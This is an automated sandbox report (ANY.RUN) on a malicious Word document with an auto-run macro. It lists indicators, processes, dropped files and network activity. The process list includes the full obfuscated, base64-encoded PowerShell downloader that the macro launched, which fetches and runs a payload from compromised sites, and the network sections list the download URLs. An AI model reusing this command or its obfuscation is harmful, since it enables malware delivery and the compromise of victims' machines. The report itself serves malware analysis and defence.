File name:

acbfc83f7017e454d0f2f9a2a238ae6062ae28546ead90b859de2fd824070d11

Full analysis: https://app.any.run/tasks/a3083098-e73f-48a7-a3e0-69c7c1bbe8c1
Verdict: Malicious activity
Analysis date: December 13, 2024, 21:19:15
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
macros
macros-on-open
susp-powershell
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Title: Nemo., Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Sep 23 22:48:00 2020, Last Saved Time/Date: Fri Dec 13 15:02:00 2024, Number of Pages: 1, Number of Words: 2755, Number of Characters: 15707, Security: 0
MD5:

2E168D8031A3D590F5827AB5686B5C83

SHA1:

134A8C88AC82BE443AFBA30F79674062CD78331C

SHA256:

ACBFC83F7017E454D0F2F9A2A238AE6062AE28546EAD90B859DE2FD824070D11

SSDEEP:

3072:eKNtK1zjRjJF4+Tg4Wzsr6FIBNvzYfMi2VWBnTFyYuOp+N:eCt+zjRvJT/WznmNv8f1WOTFyYuo+N

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • May hide the program window using WMI (SCRIPT)

      • WINWORD.EXE (PID: 5892)

  • SUSPICIOUS

    • Creates an object to access WMI (SCRIPT)

      • WINWORD.EXE (PID: 5892)

    • Executed via WMI

      • powershell.exe (PID: 3652)

    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 3652)

  • INFO

    • The process uses the downloaded file

      • WINWORD.EXE (PID: 5892)

    • Reads the software policy settings

      • powershell.exe (PID: 3652)

    • Reads mouse settings

      • WINWORD.EXE (PID: 5892)

    • Drops encrypted VBS script (Microsoft Script Encoder)

      • WINWORD.EXE (PID: 5892)

    • Sends debugging messages

      • WINWORD.EXE (PID: 5892)

    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 3652)

    • Disables trace logs

      • powershell.exe (PID: 3652)

    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 3652)

    • Create files in a temporary directory

      • powershell.exe (PID: 3652)

    • Reads security settings of Internet Explorer

      • powershell.exe (PID: 3652)

    • Gets or sets the time when the file was last written to (POWERSHELL)

      • powershell.exe (PID: 3652)

    • Checks proxy server information

      • powershell.exe (PID: 3652)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Identification: Word 8.0
LanguageCode: English (US)
DocFlags: Has picture, 1Table, ExtChar
System: Windows
Word97: No
Title: Nemo.
Subject: -
Author: -
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
Software: Microsoft Office Word
CreateDate: 2020:09:23 22:48:00
ModifyDate: 2024:12:13 15:02:00
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
CharCountWithSpaces: 18426
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: Nemo.
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
LastPrinted: 0000:00:00 00:00:00
RevisionNumber: 1
TotalEditTime: -
Words: 2755
Characters: 15707
Pages: 1
Paragraphs: 36
Lines: 130
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
125
Monitored processes
5
Malicious processes
0
Suspicious processes
2

Behavior graph

Click at the process to see the details
start svchost.exe winword.exe powershell.exe conhost.exe no specs ai.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2192C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
5892"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n C:\Users\admin\Desktop\acbfc83f7017e454d0f2f9a2a238ae6062ae28546ead90b859de2fd824070d11.doc /o ""C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
16.0.16026.20146
Modules
Images
c:\program files\microsoft office\root\office16\winword.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
3652POWeRsHeLL -ENCOD JABCADQAegBtAGEAMQBiAD0AKAAoACcAVAAnACsAJwB5AHUAJwApACsAJwBhAHYAJwArACcAYwBoACcAKQA7ACYAKAAnAG4AJwArACcAZQB3AC0AaQB0ACcAKwAnAGUAbQAnACkAIAAkAEUAbgBWADoAdQBTAEUAcgBQAFIATwBGAEkAbABFAFwASAB5AHUAOQBoAFYAMwBcAE0AZgBOAFgATwAzAHcAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAARABJAHIARQBDAFQATwBSAFkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAZQBgAGMAVQByAGkAdAB5AHAAYABSAG8AYABUAE8AQwBPAGwAIgAgAD0AIAAoACgAJwB0ACcAKwAnAGwAcwAnACkAKwAoACcAMQAyACcAKwAnACwAIAB0ACcAKQArACcAbAAnACsAKAAnAHMAJwArACcAMQAxACwAIAAnACkAKwAoACcAdABsACcAKwAnAHMAJwApACkAOwAkAFIAYwBkAHgAaQBjADgAIAA9ACAAKAAnAFgAJwArACgAJwA5AG8AJwArACcAdQAnACsAJwBxAGYAdAAnACkAKQA7ACQAQwB5AG8AdQBjAHAAZgA9ACgAJwBMAGYAJwArACgAJwB2AHAAJwArACcAbgB1AHQAJwApACkAOwAkAEUANwAyADcAMQBxAGMAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACcAewAnACsAJwAwAH0ASAB5AHUAOQBoAHYAMwAnACsAJwB7ADAAfQBNAGYAJwArACcAbgAnACsAJwB4ACcAKwAnAG8AMwB3AHsAMAB9ACcAKQAgAC0AZgBbAGMASABhAFIAXQA5ADIAKQArACQAUgBjAGQAeABpAGMAOAArACgAJwAuACcAKwAoACcAZQB4ACcAKwAnAGUAJwApACkAOwAkAFEAZgBoAHQAYQAzAHQAPQAoACgAJwBaACcAKwAnADAAMgBxACcAKQArACcAbwBjACcAKwAnAHIAJwApADsAJABYAGcAdAA2AGkAMwB3AD0AJgAoACcAbgAnACsAJwBlAHcALQBvACcAKwAnAGIAagBlAGMAdAAnACkAIABuAGUAdAAuAHcAZQBCAEMAbABpAGUAbgB0ADsAJABWADUAaABqAGMAeQAxAD0AKAAnAGgAdAAnACsAJwB0ACcAKwAoACcAcAA6AC8AJwArACcALwAnACkAKwAnAGsAJwArACgAJwBoAG8AJwArACcAYgBvACcAKwAnAHIAbQAnACsAJwBhAGwAZABhACcAKQArACgAJwAuACcAKwAnAGMAbwAnACkAKwAnAG0AJwArACcALwAnACsAKAAnAHcAcAAnACsAJwAtAGMAbwBuAHQAZQAnACsAJwBuACcAKQArACcAdAAvACcAKwAnADgAJwArACcAMgAvACcAKwAnACoAaAAnACsAKAAnAHQAdABwACcAKwAnADoAJwArACcALwAvAGIAJwApACsAKAAnAGwAJwArACcAbwBnACcAKQArACcALgB6ACcAKwAoACcAdQBuAGEAcAAnACsAJwByACcAKQArACgAJwBvAC4AJwArACcAYwAnACkAKwAoACcAbwAnACsAJwBtAC8AdwBwAC0AJwApACsAKAAnAGEAJwArACcAZABtACcAKQArACcAaQAnACsAJwBuAC8AJwArACgAJwBMACcAKwAnAEUARQAvACcAKQArACgAJwAqAGgAdAB0ACcAKwAnAHAAOgAvAC8AJwArACcAbQAnACsAJwBlAGcAYQBzACcAKQArACgAJwBvAGwAdQAnACsAJwBjAG8AJwApACsAJwBlACcAKwAnAHMAJwArACgAJwB0AGkAJwArACcALgAnACsAJwBjAG8AbQAnACkAKwAnAC8AJwArACcAUgA5ACcAKwAoACcASwBEAHEAMABPACcAKwAnADgAJwApACsAJwB3ACcAKwAnAC8AJwArACgAJwBZAC8AJwArACcAKgAnACkAKwAnAGgAdAAnACsAKAAnAHQAcABzACcAKwAnADoALwAvAG8AJwApACsAJwBuACcAKwAoACcAbABpACcAKwAnAG4AZQAyADQAaAAuACcAKQArACcAYgBpACcAKwAoACcAegAnACsAJwAvAHcAJwArACcAcAAtAGEAZABtACcAKwAnAGkAbgAvACcAKQArACcASwAvACcAKwAoACcAKgBoAHQAdAAnACsAJwBwAHMAJwApACsAKAAnADoALwAnACsAJwAvACcAKQArACcAZgAnACsAJwBlAHAAJwArACgAJwBhAG0AJwArACcAaQAuAGMAJwApACsAKAAnAG8AJwArACcAbQAvAHcAJwApACsAJwBwAC0AJwArACgAJwBpAG4AYwAnACsAJwBsAHUAZABlACcAKwAnAHMAJwApACsAKAAnAC8AZQBhACcAKwAnAEkALwAqACcAKQArACcAaAAnACsAJwB0ACcAKwAnAHQAJwArACgAJwBwADoALwAnACsAJwAvAG8AJwApACsAJwByACcAKwAnAGEAJwArACcALQAnACsAKAAnAGsAcwAnACsAJwAuAGMAJwApACsAJwBvACcAKwAoACcAbQAvACcAKwAnAHMAJwApACsAJwB5AHMAJwArACcAdABlACcAKwAoACcAbQAvACcAKwAnAGMAYQBjACcAKQArACgAJwBoACcAKwAnAGUALwAnACkAKwAoACcAdwAvACcAKwAnACoAaAAnACkAKwAoACcAdAB0ACcAKwAnAHAAOgAvACcAKwAnAC8AcAAnACkAKwAnAGEAJwArACcAZABhACcAKwAoACcAbQAnACsAJwBhAGcAJwApACsAKAAnAHIAbwAuACcAKwAnAGMAJwArACcAbwBtAC8AdwAnACkAKwAoACcAcAAtACcAKwAnAGEAZAAnACkAKwAoACcAbQBpAG4AJwArACcALwAnACkAKwAnAE4AYwAnACsAJwAvACcAKQAuACIAcwBwAEwAYABpAHQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABIAGQAagBuAGwAcgBsAD0AKAAoACcATgB5AHUAcABzACcAKwAnADMAJwApACsAJwBiACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAE0ANABzAHkAaABfAGQAIABpAG4AIAAkAFYANQBoAGoAYwB5ADEAKQB7AHQAcgB5AHsAJABYAGcAdAA2AGkAMwB3AC4AIgBEAG8AdwBuAEwAYABvAEEAZABgAEYASQBgAGwARQAiACgAJABNADQAcwB5AGgAXwBkACwAIAAkAEUANwAyADcAMQBxAGMAKQA7ACQASwA1ADkAawAwAF8AdgA9ACgAKAAnAEQAXwB3ACcAKwAnAGUAeQAnACkAKwAnAHoAdAAnACkAOwBJAGYAIAAoACgALgAoACcARwAnACsAJwBlAHQALQBJAHQAZQAnACsAJwBtACcAKQAgACQARQA3ADIANwAxAHEAYwApAC4AIgBMAGAARQBuAEcAVABIACIAIAAtAGcAZQAgADIANwA3ADUANgApACAAewAmACgAJwBJAG4AdgBvACcAKwAnAGsAZQAtAEkAdAAnACsAJwBlACcAKwAnAG0AJwApACgAJABFADcAMgA3ADEAcQBjACkAOwAkAFEAZgBrAGsAZwBqAGcAPQAoACcAVwAnACsAKAAnAF8AbQAnACsAJwBpACcAKQArACgAJwBkACcAKwAnADgAaAAnACkAKQA7AGIAcgBlAGEAawA7ACQASwBiAHUAZgBoADAAawA9ACgAJwBYAGgAJwArACgAJwBtADYAJwArACcAZwB4ADYAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEUAMgA2AHcAMwBiAGgAPQAoACgAJwBUACcAKwAnAHEAYwBfAGkAJwApACsAJwBlAGIAJwApAA== C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3552\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2728"C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ai.exe" "4FF8878C-F1E6-40DD-A7C5-4B63E9C0DC63" "8C776AF7-32D9-43FB-8490-B655182643F6" "5892"C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ai.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Artificial Intelligence (AI) Host for the Microsoft® Windows® Operating System and Platform x64.
Version:
0.12.2.0
Modules
Images
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\office16\ai.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\common files\microsoft shared\clicktorun\appvisvsubsystems64.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
Total events
19 451
Read events
19 070
Write events
354
Delete events
27

Modification events

(PID) Process:(5892) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\ClientTelemetry\Sampling
Operation:writeName:0
Value:
017012000000001000B24E9A3E02000000000000000600000000000000
(PID) Process:(5892) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\5892
Operation:writeName:0
Value:
0B0E104FA531781E0DD146873ED2FFE8F78055230046F8B1E0F5CAB4D3ED016A04102400449A7D64B29D01008500A907556E6B6E6F776EC906022222CA0DC2190000C91003783634C511842ED2120B770069006E0077006F00720064002E00650078006500C51620C517808004C91808323231322D44656300
(PID) Process:(5892) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:en-US
Value:
2
(PID) Process:(5892) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:de-de
Value:
2
(PID) Process:(5892) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:fr-fr
Value:
2
(PID) Process:(5892) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:es-es
Value:
2
(PID) Process:(5892) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:it-it
Value:
2
(PID) Process:(5892) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:ja-jp
Value:
2
(PID) Process:(5892) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:ko-kr
Value:
2
(PID) Process:(5892) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:pt-br
Value:
2
Executable files
15
Suspicious files
112
Text files
35
Unknown types
4

Dropped files

PID
Process
Filename
Type
5892WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:F4ACA9C3BC1A062B79EBDD99041CEB1D
SHA256:0D1A9B70F50725CEF26A428ECF11CC782DBBF6F0540DC91386C0CD8E0CA34BC8
3652powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_yh3adisd.4yv.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5892WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\acbfc83f7017e454d0f2f9a2a238ae6062ae28546ead90b859de2fd824070d11.doc.LNKlnk
MD5:887A27B6CA782D9A03AB594ADC8C723A
SHA256:2B8DA491C6EE4A021AD7D735A5E220BFA5A19671CF7C967F496709C753224E6D
5892WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\TokenBroker\Cache\56a61aeb75d8f5be186c26607f4bb213abe7c5ec.tbresbinary
MD5:6B5C098F8BE9EB1AB9583B8FBD5A389C
SHA256:CEB02EE4A4CFBC8F8B5EA7168EE6394B6BAEB454046E90A04B91C6CBC02745BE
5892WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\16.0\UsageMetricsStore\FileActivityStoreV3\Word\ASkwMDAwMDAwMC0wMDAwLTAwMDAtMDAwMC0wMDAwMDAwMDAwMDBfTnVsbAA.Sbinary
MD5:7F8CAB70E43496A3977FDA014161F135
SHA256:548827CBB3F307C3C52F387EB7998E2571845BF268D4D98289245CD55C10F3DE
5892WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\F5B2E497-B746-4D97-A333-887B3EAE0BFCxml
MD5:67F9F740F21838E4050254B5E33A505A
SHA256:6720E3967ABF49B663BB094D9886DDCDFC8E9C40B8E1749227F1C40FF6C12A62
5892WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\16.0\AddInClassifierCache\OfficeSharedEntitiesUpdated.bintext
MD5:6DD8C16360BF3B507834737673B1BFE0
SHA256:EE4086FEC607CC5C788562D626C9A3C018534C1DF551DADCD7CEAFD7D0DDA306
5892WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms~RF1388fa.TMPbinary
MD5:4FCB2A3EE025E4A10D21E1B154873FE2
SHA256:90BF6BAA6F968A285F88620FBF91E1F5AA3E66E2BAD50FD16F37913280AD8228
5892WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\16.0\AddInClassifierCache\OfficeSharedEntities.bintext
MD5:CC90D669144261B198DEAD45AA266572
SHA256:89C701EEFF939A44F28921FD85365ECD87041935DCD0FE0BAF04957DA12C9899
3652powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:50DC601185C2B5589C03A147C59CBA32
SHA256:A3A20C44E9401DC08B042D4F6829CA15C7CFC1FABB4EECB945C1E45D8086A77F
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
73
TCP/UDP connections
86
DNS requests
22
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4328
svchost.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
4328
svchost.exe
GET
200
23.48.23.156:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
3652
powershell.exe
GET
404
186.209.113.101:80
http://megasolucoesti.com/R9KDq0O8w/Y/
unknown
3652
powershell.exe
GET
403
188.114.97.3:80
http://ora-ks.com/system/cache/w/
unknown
GET
200
52.109.28.46:443
https://officeclient.microsoft.com/config16/?lcid=1033&syslcid=1033&uilcid=1033&build=16.0.16026&crev=3
unknown
xml
178 Kb
whitelisted
GET
200
2.19.198.40:443
https://omex.cdn.office.net/addinclassifier/officesharedentities
unknown
text
314 Kb
whitelisted
GET
200
52.111.236.7:443
https://messaging.lifecycle.office.com/getcustommessage16?app=0&ui=en-US&src=BizBar&messagetype=BizBar&hwid=04111-083-043729&ver=16.0.16026&lc=en-US&platform=10%3A0%3A19045%3A2%3A0%3A0%3A256%3A1%3A&productid=%7B1717C1E0-47D3-4899-A6D3-1022DB7415E0%7D%3A00411-10830-43729-AA720%3AOffice%2019%2C%20Office19Professional2019R_Retail%20edition&clientsessionid=%7B7831A54F-0D1E-46D1-873E-D2FFE8F78055%7D&datapropertybag=%7B%22Audience%22%3A%22Production%22%2C%22AudienceGroup%22%3A%22Production%22%2C%22AudienceChannel%22%3A%22CC%22%2C%22Flight%22%3A%22ofsh6c2b1tla1a31%2Cofcrui4yvdulbf31%2Cofhpex3jznepoo31%2Cofpioygfqmufst31%2Cofjhlwlmoc1pz531%22%7D
unknown
text
542 b
whitelisted
GET
200
184.24.77.4:443
https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851221.cab
unknown
compressed
30.8 Kb
whitelisted
GET
200
23.53.43.83:443
https://metadata.templates.cdn.office.net/client/templates/gallery?lcid=1033&syslcid=1033&uilcid=1033&app=0&ver=16&tl=2&build=16.0.16026&gtype=0%2C1%2C2%2C5%2C
unknown
xml
10.7 Kb
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4328
svchost.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
192.168.100.255:137
whitelisted
4712
MoUsoCoreWorker.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
92.123.104.32:443
www.bing.com
Akamai International B.V.
DE
whitelisted
4
System
192.168.100.255:138
whitelisted
5892
WINWORD.EXE
52.109.28.46:443
officeclient.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
GB
whitelisted
4328
svchost.exe
23.48.23.156:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
5892
WINWORD.EXE
52.113.194.132:443
ecs.office.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
5892
WINWORD.EXE
2.19.198.51:443
omex.cdn.office.net
Akamai International B.V.
DE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 20.73.194.208
  • 40.127.240.158
whitelisted
www.bing.com
  • 92.123.104.32
  • 92.123.104.33
  • 92.123.104.19
  • 92.123.104.26
  • 92.123.104.29
  • 92.123.104.27
  • 92.123.104.21
  • 92.123.104.30
  • 92.123.104.24
whitelisted
google.com
  • 142.250.185.206
whitelisted
officeclient.microsoft.com
  • 52.109.28.46
whitelisted
crl.microsoft.com
  • 23.48.23.156
  • 23.48.23.194
  • 23.48.23.176
  • 23.48.23.167
  • 23.48.23.143
  • 23.48.23.173
  • 23.48.23.169
  • 23.48.23.177
  • 23.48.23.147
whitelisted
omex.cdn.office.net
  • 2.19.198.51
  • 2.19.198.56
  • 23.32.238.155
  • 2.19.198.40
  • 2.19.198.58
whitelisted
ecs.office.com
  • 52.113.194.132
whitelisted
www.microsoft.com
  • 23.35.229.160
whitelisted
messaging.lifecycle.office.com
  • 52.111.236.7
whitelisted
khobormalda.com
malicious

Threats

No threats detected
Process
Message
WINWORD.EXE
WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.
WINWORD.EXE
WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.
WINWORD.EXE
WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
acbfc83f7017e454d0f2f9a2a238ae6062ae28546ead90b859de2fd824070d11